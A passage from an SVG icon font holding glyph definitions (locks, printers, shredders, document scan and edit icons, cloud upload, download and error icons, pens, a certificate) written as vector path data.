<glyph unicode="&#xea2c;" glyph-name="lock-rounded-open3" d="M768 656v-95.995c0-26.427-21.49-48.005-48-48.005-26.694 0-48 21.493-48 48.005v128.012c0 79.52-64.633 143.983-144 143.983-79.529 0-144-64.327-144-143.983v-224.034c0-5.402 0.298-10.735 0.879-15.983h383.121c53.093-0.152 96-43.21 96-96.303v-159.697c0-141.097-114.602-256-255.971-256h-160.057c-141.214 0-255.971 114.615-255.971 256v159.697c0 53.437 42.955 96.152 96 96.303v240.025c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-32.024zM736 688.21c0 114.759-93.359 207.79-208 207.79-114.875 0-208-93.061-208-207.79v-224.421c0-5.312 0.2-10.578 0.593-15.79h31.407v239.71c0 97.525 78.798 176.29 176 176.29 97.004 0 176-78.928 176-176.29v-127.781c0-8.797 7.422-15.929 16-15.929v0c8.837 0 16 6.882 16 15.695v128.515zM512 194.731v0 0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM480 175.994v-63.941c0-26.539 21.306-48.054 48-48.054 26.51 0 48 21.478 48 48.054v63.941c19.431 14.595 32 37.833 32 64.006 0 44.183-35.817 80-80 80s-80-35.817-80-80c0-26.173 12.569-49.411 32-64.006v0 0zM287.918 416c-35.301 0-63.918-28.706-63.918-64.187v-159.813c0-123.712 100.399-224 223.807-224h160.387c123.605 0 223.807 100.54 223.807 224v159.813c0 35.45-28.51 64.187-63.918 64.187h-480.165z" />
<glyph unicode="&#xea2d;" glyph-name="lock-rounded-open4" d="M512 194.731v0 0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM768 656v32.024c0 132.535-107.721 239.976-240 239.976-132.548 0-240-107.415-240-239.976v-240.025c-53.045-0.15-96-42.866-96-96.303v-159.697c0-141.385 114.757-256 255.971-256h160.057c141.369 0 255.971 114.903 255.971 256v159.697c0 53.093-42.907 96.151-96 96.303h-383.121c-0.581 5.248-0.879 10.581-0.879 15.983v224.034c0 79.656 64.471 143.983 144 143.983 79.367 0 144-64.463 144-143.983v-115.984c0-33.155 21.306-60.033 48-60.033 26.51 0 48 27.142 48 60.033v83.967z" />
<glyph unicode="&#xea2e;" glyph-name="combination-lock" d="M832 128v64h-288v32h288v64h-288v32h288v64h-288v32h288c-0.1 35.364-28.572 64-63.917 64h-480.165c-35.301 0-63.918-28.706-63.918-64.187v-319.625c0-35.45 28.51-64.187 63.918-64.187h480.165c35.238 0 63.817 28.605 63.917 64h-288v32h288zM288 512v112.025c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-112.025c53.093-0.152 96-43.21 96-96.303v-319.393c0-53.531-43.107-96.303-96.281-96.303h-479.438c-53.222 0-96.281 43.116-96.281 96.303v319.393c0 53.437 42.955 96.152 96 96.303v0 0zM320 512h32v111.71c0 97.525 78.798 176.29 176 176.29 97.004 0 176-78.928 176-176.29v-111.71h32v112.21c0 114.759-93.359 207.79-208 207.79-114.875 0-208-93.061-208-207.79v-112.21zM384 512h288v111.973c0 79.544-64.633 144.027-144 144.027-79.529 0-144-64.296-144-144.027v-111.973z" />
<glyph unicode="&#xea2f;" glyph-name="combination-lock2" d="M864 96h-320v32h320v64h-320v32h320v64h-320v32h320v64h-320v32h320c-0.163 52.954-43.008 95.848-96 96v112.025c0 132.535-107.721 239.976-240 239.976-132.548 0-240-107.415-240-239.976v-112.025c-53.045-0.15-96-42.866-96-96.303v-319.393c0-53.187 43.059-96.303 96.281-96.303h479.438c53.074 0 96.118 42.611 96.281 96zM384 512v111.973c0 79.731 64.471 144.027 144 144.027 79.367 0 144-64.483 144-144.027v-111.973h-288z" />
<glyph unicode="&#xea30;" glyph-name="printer3" d="M800 96v-32.012c0-35.59-28.617-63.988-63.918-63.988h-480.165c-35.408 0-63.918 28.648-63.918 63.988v32.012h-64.183c-52.919 0-95.817 42.972-95.817 95.982v288.037c0 52.962 42.899 95.982 95.817 95.982h64.183v224.012c0 35.59 28.617 63.988 63.918 63.988h480.165c35.408 0 63.918-28.648 63.918-63.988v-224.012h64.183c52.919 0 95.817-42.972 95.817-95.982v-288.037c0-52.962-42.899-95.982-95.817-95.982h-64.183zM192 128v192h608v-192h63.765c35.476 0 64.235 28.593 64.235 64.088v287.823c0 35.395-28.747 64.088-64.235 64.088h-735.531c-35.476 0-64.235-28.593-64.235-64.088v-287.823c0-35.395 28.747-64.088 64.235-64.088h63.765zM255.999 832c-17.672 0-31.999-14.497-31.999-31.905v-224.095h544v224.095c0 17.621-14.551 31.905-31.999 31.905h-480.003zM224 288v-224.095c0-17.621 14.551-31.905 31.999-31.905h480.003c17.672 0 31.999 14.497 31.999 31.905v224.095h-544zM768 416c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xea31;" glyph-name="printer4" d="M192 608v192.083c0 35.249 28.617 63.917 63.918 63.917h480.165c35.408 0 63.918-28.616 63.918-63.917v-192.083h-608zM160 96h-32.183c-52.919 0-95.817 42.972-95.817 95.982v288.037c0 52.962 42.899 95.982 95.817 95.982h736.366c52.919 0 95.817-42.972 95.817-95.982v-288.037c0-52.962-42.899-95.982-95.817-95.982h-32.183v256h-672v-256zM192 320v-256.012c0-35.339 28.51-63.988 63.918-63.988h480.165c35.301 0 63.918 28.398 63.918 63.988v256.012h-608zM768 416c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xea32;" glyph-name="printer5" d="M800 160h64.183c52.918 0 95.817 43.019 95.817 95.982v288.037c0 53.009-42.898 95.982-95.817 95.982h-64.183v224.012c0 35.339-28.51 63.988-63.918 63.988h-480.165c-35.301 0-63.918-28.398-63.918-63.988v-224.012h-64.183c-52.918 0-95.817-43.019-95.817-95.982v-288.037c0-53.009 42.898-95.982 95.817-95.982h64.183v-128.012c0-35.339 28.51-63.988 63.918-63.988h480.165c35.301 0 63.918 28.398 63.918 63.988v128.012zM192 192h-63.765c-35.488 0-64.235 28.693-64.235 64.088v287.823c0 35.495 28.759 64.088 64.235 64.088h735.531c35.488 0 64.235-28.693 64.235-64.088v-287.823c0-35.495-28.759-64.088-64.235-64.088h-63.765v96h-608v-96zM255.999 896h480.003c17.448 0 31.999-14.284 31.999-31.905v-224.095h-544v224.095c0 17.408 14.326 31.905 31.999 31.905zM224 256h544v-224.095c0-17.408-14.326-31.905-31.999-31.905h-480.003c-17.448 0-31.999 14.284-31.999 31.905v224.095zM768 448c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xea33;" glyph-name="printer6" d="M192 672v192.083c0 35.249 28.617 63.917 63.918 63.917h480.165c35.408 0 63.918-28.616 63.918-63.917v-192.083h-608zM160 160h-32.183c-52.919 0-95.817 42.972-95.817 95.982v288.037c0 52.962 42.899 95.982 95.817 95.982h736.366c52.919 0 95.817-42.972 95.817-95.982v-288.037c0-52.962-42.899-95.982-95.817-95.982h-32.183v160h-672v-160zM192 288v-256.012c0-35.339 28.51-63.988 63.918-63.988h480.165c35.301 0 63.918 28.398 63.918 63.988v256.012h-608zM768 448c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xea34;" glyph-name="printer-text" d="M832 96v-32.012c0-35.59-28.617-63.988-63.918-63.988h-480.165c-35.408 0-63.918 28.648-63.918 63.988v32.012h-64.183c-52.919 0-95.817 42.972-95.817 95.982v288.037c0 52.962 42.899 95.982 95.817 95.982h64.183v224.012c0 35.59 28.617 63.988 63.918 63.988h480.165c35.408 0 63.918-28.648 63.918-63.988v-224.012h64.183c52.919 0 95.817-42.972 95.817-95.982v-288.037c0-52.962-42.899-95.982-95.817-95.982h-64.183zM224 128v192h608v-192h63.765c35.476 0 64.235 28.593 64.235 64.088v287.823c0 35.395-28.747 64.088-64.235 64.088h-735.531c-35.476 0-64.235-28.593-64.235-64.088v-287.823c0-35.395 28.747-64.088 64.235-64.088h63.765zM287.999 832c-17.672 0-31.999-14.497-31.999-31.905v-224.095h544v224.095c0 17.621-14.551 31.905-31.999 31.905h-480.003zM256 288v-224.095c0-17.621 14.551-31.905 31.999-31.905h480.003c17.672 0 31.999 14.497 31.999 31.905v224.095h-544zM800 416c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM288 224v-32h480v32h-480zM288 128v-32h480v32h-480z" />
<glyph unicode="&#xea35;" glyph-name="printer-text2" d="M224 608v192.083c0 35.249 28.617 63.917 63.918 63.917h480.165c35.408 0 63.918-28.616 63.918-63.917v-192.083h-608zM192 96h-32.183c-52.919 0-95.817 42.972-95.817 95.982v288.037c0 52.962 42.899 95.982 95.817 95.982h736.366c52.919 0 95.817-42.972 95.817-95.982v-288.037c0-52.962-42.899-95.982-95.817-95.982h-32.183v256h-672v-256zM224 320h608v-256.012c0-35.59-28.617-63.988-63.918-63.988h-480.165c-35.408 0-63.918 28.648-63.918 63.988v256.012zM800 416c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM288 224v-32h480v32h-480zM288 128v-32h480v32h-480z" />
<glyph unicode="&#xea36;" glyph-name="printer-text3" d="M800 160h64.183c52.918 0 95.817 43.019 95.817 95.982v288.037c0 53.009-42.898 95.982-95.817 95.982h-64.183v224.012c0 35.339-28.51 63.988-63.918 63.988h-480.165c-35.301 0-63.918-28.398-63.918-63.988v-224.012h-64.183c-52.918 0-95.817-43.019-95.817-95.982v-288.037c0-53.009 42.898-95.982 95.817-95.982h64.183v-128.012c0-35.339 28.51-63.988 63.918-63.988h480.165c35.301 0 63.918 28.398 63.918 63.988v128.012zM192 192h-63.765c-35.488 0-64.235 28.693-64.235 64.088v287.823c0 35.495 28.759 64.088 64.235 64.088h735.531c35.488 0 64.235-28.693 64.235-64.088v-287.823c0-35.495-28.759-64.088-64.235-64.088h-63.765v96h-608v-96zM255.999 896h480.003c17.448 0 31.999-14.284 31.999-31.905v-224.095h-544v224.095c0 17.408 14.326 31.905 31.999 31.905zM224 256h544v-224.095c0-17.408-14.326-31.905-31.999-31.905h-480.003c-17.448 0-31.999 14.284-31.999 31.905v224.095zM768 448c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM256 192v-32h480v32h-480zM256 96v-32h480v32h-480z" />
<glyph unicode="&#xea37;" glyph-name="printer-text4" d="M192 672v192.083c0 35.249 28.617 63.917 63.918 63.917h480.165c35.408 0 63.918-28.616 63.918-63.917v-192.083h-608zM160 160h-32.183c-52.919 0-95.817 42.972-95.817 95.982v288.037c0 52.962 42.899 95.982 95.817 95.982h736.366c52.919 0 95.817-42.972 95.817-95.982v-288.037c0-52.962-42.899-95.982-95.817-95.982h-32.183v160h-672v-160zM192 288h608v-256.012c0-35.59-28.617-63.988-63.918-63.988h-480.165c-35.408 0-63.918 28.648-63.918 63.988v256.012zM768 448c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM256 192v-32h480v32h-480zM256 96v-32h480v32h-480z" />
<glyph unicode="&#xea38;" glyph-name="document-shred" d="M864 320h-672v-64h-32v160h32v-64h672v64h32v-160h-32v64zM832 384h-32v224h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-416.145h-32v415.765c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-256zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM800 288v-288h32v288h-32zM736 288v-256h32v256h-32zM672 288v-224h32v224h-32zM608 288v-288h32v288h-32zM544 288v-256h32v256h-32zM480 288v-288h32v288h-32zM416 288v-224h32v224h-32zM352 288v-288h32v288h-32zM288 288v-256h32v256h-32zM224 288v-288h32v288h-32z" />
<glyph unicode="&#xea39;" glyph-name="document-shred2" d="M864 320h-672v-64h-32v160h32v-64h672v64h32v-160h-32v64zM224 384v415.765c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-224h-608zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM800 288v-288h32v288h-32zM736 288v-256h32v256h-32zM672 288v-224h32v224h-32zM608 288v-288h32v288h-32zM544 288v-256h32v256h-32zM480 288v-288h32v288h-32zM416 288v-224h32v224h-32zM352 288v-288h32v288h-32zM288 288v-256h32v256h-32zM224 288v-288h32v288h-32z" />
<glyph unicode="&#xea3a;" glyph-name="shredder" d="M832 224h32.183c52.918 0 95.817 43.162 95.817 96.186v159.629c0 53.122-42.898 96.186-95.817 96.186h-64.183v224.012c0 35.339-28.51 63.988-63.918 63.988h-480.165c-35.301 0-63.918-28.398-63.918-63.988v-224.012h-64.183c-52.918 0-95.817-43.162-95.817-96.186v-159.629c0-53.122 42.898-96.186 95.817-96.186h32.183v96h672v-96zM128 256c-35.38 0.126-64 28.694-64 63.916v160.167c0 35.249 28.759 63.917 64.235 63.917h735.531c35.488 0 64.235-28.616 64.235-63.917v-160.167c0-35.171-28.632-63.79-64-63.916v96h-736v-96zM255.999 832h480.003c17.448 0 31.999-14.284 31.999-31.905v-224.095h-544v224.095c0 17.408 14.326 31.905 31.999 31.905zM768 416c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM192 288v-256h32v256h-32zM256 288v-224h32v224h-32zM320 288v-256h32v256h-32zM384 288v-192h32v192h-32zM448 288v-224h32v224h-32zM512 288v-192h32v192h-32zM576 288v-256h32v256h-32zM704 288v-224h32v224h-32zM768 288v-256h32v256h-32zM640 288v-192h32v192h-32z" />
<glyph unicode="&#xea3b;" glyph-name="shredder2" d="M192 608v192.083c0 35.249 28.617 63.917 63.918 63.917h480.165c35.408 0 63.918-28.616 63.918-63.917v-192.083h-608zM160 224h-32.183c-52.919 0-95.817 43.064-95.817 96.186v159.629c0 53.023 42.899 96.186 95.817 96.186h736.366c52.919 0 95.817-43.064 95.817-96.186v-159.629c0-53.023-42.899-96.186-95.817-96.186h-32.183v96h-672v-96zM768 416c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM192 288v-256h32v256h-32zM256 288v-224h32v224h-32zM320 288v-256h32v256h-32zM384 288v-192h32v192h-32zM448 288v-224h32v224h-32zM512 288v-192h32v192h-32zM576 288v-256h32v256h-32zM704 288v-224h32v224h-32zM768 288v-256h32v256h-32zM640 288v-192h32v192h-32z" />
<glyph unicode="&#xea3c;" glyph-name="document-scan" d="M704 32h-64v32h64v-32zM736 32h32.082c35.301 0 63.918 28.743 63.918 63.705v32.295h-32v-32.211c0-17.55-14.326-31.789-31.999-31.789h-32.001v-32zM608 32h-64v32h64v-32zM512 32h-64v32h64v-32zM416 32h-64v32h64v-32zM320 32h-32.082c-35.408 0-63.918 28.759-63.918 64.235v31.765h32v-32.145c0-17.593 14.551-31.855 31.999-31.855h32.001v-32zM832 160v64h-32v-64h32zM224 160v64h32v-64h-32zM832 256v64h-32v-64h32zM224 256v64h32v-64h-32zM864 384v64h32v-160h-32v64h-672v-64h-32v160h32v-64h672zM832 416h-32v224h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-416.145h-32v415.765c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-256zM640 848v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176z" />
<glyph unicode="&#xea3d;" glyph-name="document-scan2" d="M608 32h-64v32h64v-32zM640 32h64v32h-64v-32zM416 32h-64v32h64v-32zM448 32h64v32h-64v-32zM320 32h-32.082c-35.408 0-63.918 28.759-63.918 64.235v31.765h32v-32.079c0-17.63 14.551-31.921 31.999-31.921h32.001v-32zM832 256v64h-32v-64h32zM832 224v-64h-32v64h32zM224 256v64h32v-64h-32zM224 224v-64h32v64h-32zM864 384v64h32v-160h-32v64h-672v-64h-32v160h32v-64h672zM832 416v224h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-415.765h608zM832 128v-32.082c0-35.408-28.617-63.918-63.918-63.918h-32.082v32h32.001c17.672 0 31.999 14.282 31.999 31.921v32.079h32zM640 896v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xea3e;" glyph-name="cloud-download2" d="M480 88l-104 104-24-24 144-144 144 144-24 24-104-104v360h-32v-360zM448 256h-223.91c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 83.694 0 154.881-53.551 181.166-128.257 24.779 20.167 56.395 32.257 90.834 32.257 75.467 0 137.375-58.053 143.502-131.938v0c55.362-14.081 96.498-64.286 96.498-124.062 0-70.549-57.348-128-128.090-128h-223.91v-32h224.018c88.356 0 159.982 71.814 159.982 160 0 67.085-41.175 124.528-99.748 148.304v0c-16.731 79.784-87.495 139.696-172.252 139.696-27.613 0-53.74-6.359-76.998-17.692-38.484 67.886-111.394 113.692-195.002 113.692-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169v0c-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h224.018v32z" />
<glyph unicode="&#xea3f;" glyph-name="cloud-download3" d="M512 224h256.018c88.356 0 159.982 71.814 159.982 160 0 67.085-41.175 124.528-99.748 148.304v0c-16.731 79.784-87.495 139.696-172.252 139.696-27.613 0-53.74-6.359-76.998-17.692-38.484 67.886-111.394 113.692-195.002 113.692-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169v0c-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h256.018v-136l-104 104-24-24 144-144 144 144-24 24-104-104v136zM480 448v-224h32v224h-32z" />
<glyph unicode="&#xea40;" glyph-name="cloud-upload2" d="M480 448l-104-104-24 24 144 144 144-144-24-24-104 104v-352h-32v352zM448 288h-223.91c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 83.694 0 154.881-53.551 181.166-128.257 24.779 20.167 56.395 32.257 90.834 32.257 75.467 0 137.375-58.053 143.502-131.938v0c55.362-14.081 96.498-64.286 96.498-124.062 0-70.549-57.348-128-128.090-128h-223.91v-32h224.018c88.356 0 159.982 71.814 159.982 160 0 67.085-41.175 124.528-99.748 148.304v0c-16.731 79.784-87.495 139.696-172.252 139.696-27.613 0-53.74-6.359-76.998-17.692-38.484 67.886-111.394 113.692-195.002 113.692-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169v0c-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h224.018v32z" />
<glyph unicode="&#xea41;" glyph-name="cloud-upload3" d="M512 256h256.018c88.356 0 159.982 71.814 159.982 160 0 67.085-41.175 124.528-99.748 148.304v0c-16.731 79.784-87.495 139.696-172.252 139.696-27.613 0-53.74-6.359-76.998-17.692-38.484 67.886-111.394 113.692-195.002 113.692-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169v0c-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h256.018v192l-104-104-24 24 144 144 144-144-24-24-104 104v-192zM480 256v-160h32v160h-32z" />
<glyph unicode="&#xea42;" glyph-name="cloud-error" d="M363.636 288h-139.546c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 83.694 0 154.881-53.551 181.166-128.257 24.779 20.167 56.395 32.257 90.834 32.257 75.467 0 137.375-58.053 143.502-131.938v0c55.362-14.081 96.498-64.286 96.498-124.062 0-70.549-57.348-128-128.090-128h-139.546l-132.364 224-132.364-224zM647.273 256h120.745c88.356 0 159.982 71.814 159.982 160 0 67.085-41.175 124.528-99.748 148.304v0c-16.731 79.784-87.495 139.696-172.252 139.696-27.613 0-53.74-6.359-76.998-17.692-38.484 67.886-111.394 113.692-195.002 113.692-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169v0c-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h120.745l-56.727-96h416l-56.727 96zM496 448l152-256h-304l152 256zM480 384v-96h32v96h-32zM480 256v-32h32v32h-32z" />
<glyph unicode="&#xea43;" glyph-name="cloud-error2" d="M686.769 256h81.249c88.356 0 159.982 71.814 159.982 160 0 67.085-41.175 124.528-99.748 148.304v0c-16.731 79.784-87.495 139.696-172.252 139.696-27.613 0-53.74-6.359-76.998-17.692-38.484 67.886-111.394 113.692-195.002 113.692-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169v0c-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h81.249l190.769 320 190.769-320zM496 512l208-352h-416l208 352zM480 384v-96h32v96h-32zM480 256v-32h32v32h-32z" />
<glyph unicode="&#xea44;" glyph-name="cloud4" d="M195.232 444.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 59.775-41.136 109.981-96.498 124.062v0c-6.127 73.885-68.035 131.938-143.502 131.938-34.439 0-66.055-12.090-90.834-32.257-26.285 74.707-97.471 128.257-181.166 128.257-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0zM828.252 468.304c58.574-23.776 99.748-81.218 99.748-148.304 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 83.608 0 156.518-45.806 195.002-113.692 23.258 11.333 49.385 17.692 76.998 17.692 84.757 0 155.521-59.912 172.252-139.696v0 0z" />
<glyph unicode="&#xea45;" glyph-name="cloud5" d="M828.252 468.304c58.574-23.776 99.748-81.218 99.748-148.304 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 83.608 0 156.518-45.806 195.002-113.692 23.258 11.333 49.385 17.692 76.998 17.692 84.757 0 155.521-59.912 172.252-139.696z" />
<glyph unicode="&#xea46;" glyph-name="inbox-filled" d="M640 448h216.801l-140 224h-441.602l-140-224h216.801v-63.844c0-35.432 28.667-64.156 63.917-64.156h160.167c35.3 0 63.917 28.605 63.917 64.156v63.844zM672 416v-48c0-44.491-35.761-80-79.874-80h-192.252c-44.185 0-79.874 35.817-79.874 80v48h-192v-224h736v224h-192zM96 424v24l160 256h480l160-256v-288h-800v264zM320 640l-19.199-32h390.398l-19.199 32h-352zM278.398 576l-19.199-32h473.602l-19.199 32h-435.203zM240 512l-19.199-32h550.398l-19.199 32h-512z" />
<glyph unicode="&#xea47;" glyph-name="inbox-filled2" d="M352 448v-63.844c0-35.432 28.667-64.156 63.917-64.156h160.167c35.3 0 63.917 28.605 63.917 64.156v63.844h216.801l-140 224h-441.602l-140-224h216.801zM96 448l160 256h480l160-256v-288h-800v288zM320 640l-19.199-32h390.398l-19.199 32h-352zM278.398 576l-19.199-32h473.602l-19.199 32h-435.203zM240 512l-19.199-32h550.398l-19.199 32h-512z" />
<glyph unicode="&#xea48;" glyph-name="pen3" d="M576 160h-128v512h128v-512zM568.616 128l-56.616-73.6-56.616 73.6h113.231zM576 704h-128v95.9c0 17.596 14.461 32.1 32.3 32.1h63.4c18.113 0 32.3-14.372 32.3-32.1v-95.9zM512 0l96 128v671.972c0 35.361-28.744 64.028-63.933 64.028h-64.134c-35.309 0-63.933-28.852-63.933-64.028v-671.972l96-128z" />
<glyph unicode="&#xea49;" glyph-name="pen4" d="M608 160v512h-192v-512h192zM608 128l-96-128-96 128h192zM608 704v95.972c0 35.361-28.744 64.028-63.933 64.028h-64.134c-35.309 0-63.933-28.852-63.933-64.028v-95.972h192z" />
<glyph unicode="&#xea4a;" glyph-name="pen-angled" d="M718.183 571.189l-361.159-361.586-83.378 83.378 361.347 361.398 83.19-83.19zM740.797 593.83l-83.178 83.178 55.274 55.282c12.523 12.525 32.766 12.428 45.33-0.102l37.754-37.65c12.541-12.506 12.633-32.815 0.153-45.309l-55.334-55.399zM252.919 268.454l79.851-79.851-100.317-19.755 20.465 99.606zM224 288l-32-160 160 32 466.563 466.563c25.094 25.094 25.155 65.719 0.309 90.565l-37.744 37.744c-24.924 24.924-65.199 25.057-90.565-0.309l-466.563-466.563z" />
<glyph unicode="&#xea4b;" glyph-name="pen-angled2" d="M763.3 571.3l55.2 55.2c25.1 25.1 25.2 65.7 0.3 90.6l-37.7 37.7c-24.9 24.9-65.2 25.1-90.6-0.3l-55.2-55.2 128-128zM228.7 292.7l-4.7-4.7-32-160 160 32 4.7 4.7zM251.336 315.329l361.399 361.399 127.985-127.985-361.399-361.399-127.985 127.985z" />
<glyph unicode="&#xea4c;" glyph-name="document-edit" d="M846.183 571.189l-361.159-361.586-83.378 83.378 361.347 361.398 83.19-83.19zM868.797 593.83l-83.178 83.178 55.274 55.282c12.523 12.525 32.766 12.428 45.33-0.102l37.754-37.65c12.541-12.506 12.633-32.815 0.153-45.309l-55.334-55.399zM380.919 268.454l79.851-79.851-100.317-19.755 20.465 99.606zM704 640v0l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v320.295l242.563 242.563c25.094 25.094 25.155 65.719 0.309 90.565l-37.744 37.744c-24.924 24.924-65.199 25.057-90.565-0.309l-114.563-114.563zM672 352v-288.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067l-320-320-32-160 160 32 192 192zM512 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719z" />
<glyph unicode="&#xea4d;" glyph-name="document-edit2" d="M846.183 571.189l-83.19 83.19-361.347-361.398 83.378-83.378 361.159 361.586zM868.797 593.83l55.334 55.399c12.479 12.494 12.387 32.803-0.153 45.309l-37.754 37.65c-12.564 12.529-32.807 12.627-45.33 0.102l-55.274-55.282 83.178-83.178zM380.919 268.454l-20.465-99.606 100.317 19.755-79.851 79.851zM704 384v-320.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h127.811l146.563 146.563c25.366 25.366 65.641 25.232 90.565 0.309l37.744-37.744c24.846-24.846 24.785-65.471-0.309-90.565l-242.563-242.563zM512 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xea4e;" glyph-name="document-certificate" d="M672 161.616v0 0c19.795 20.201 32 47.867 32 78.384 0 61.856-50.144 112-112 112s-112-50.144-112-112c0-30.517 12.205-58.183 32-78.384v-33.616h-256.001c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-544.211c0-17.55-14.326-31.789-31.999-31.789h-64.001v33.616zM544 138.778v0 0c14.548-6.911 30.822-10.778 48-10.778s33.452 3.867 48 10.778v-125.977l-48 47.999-48-47.999v125.977zM672 96h64.082c35.301 0 63.918 28.743 63.918 63.705v576.295l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h256.082v-160l80 80 80-80v160zM608 912l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM288 736v-32h224v32h-224zM288 832v-32h224v32h-224zM288 640v-32h416v32h-416zM288 544v-32h416v32h-416zM288 448v-32h416v32h-416zM592 160v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80z" />
